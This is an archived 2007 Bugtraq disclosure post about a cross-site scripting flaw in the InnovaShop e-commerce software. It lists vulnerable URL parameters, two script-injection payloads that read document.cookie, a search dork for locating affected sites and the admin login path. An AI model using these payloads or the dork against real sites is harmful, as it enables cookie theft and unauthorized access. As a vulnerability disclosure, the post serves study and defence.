Bugtraq mailing list archives
InnovaShop® (mgs.jps) Cross Siting Scripting
From: jose luis góngora fernández <sys-project () hotmail com>
Date: Mon, 15 Oct 2007 18:55:53 +0000
# InnovaShop® (mgs.jps) Cross Siting Scripting # Download: # http://www.innovaage.com/ # http://www.innovaportal.com/ # Bug found by JosS / Jose Luis Góngora Fernández # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Site developed by InnovaAge®" / "Powered by InnovaPortal©" # Stop lammer # Exploit In (XSS): http://www.server/path/msg.jsp?msg=[XSS] http://www.server/path/tc/contents/home001.jsp?contentid=[XSS] http://www.server/innovashop/msg.jsp?msg=[XSS] http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS] ....all... # Cross Siting Scripting (Code): <script>alert(document.cookie)</script> "><script>alert(document.cookie)</script> # Admin Login: http://server/admin/ //---------------------------------------\\ Greetz To: All Hackers JosS! / Jose Luis Góngora Fernández _________________________________________________________________Grandes éxitos, superhéroes, imitaciones, cine y TV... http://es.msn.kiwee.com/ Lo mejor para tu móvil.
Current thread:
- InnovaShop® (mgs.jps) Cross Siting Scripting jose luis góngora fernández (Oct 15)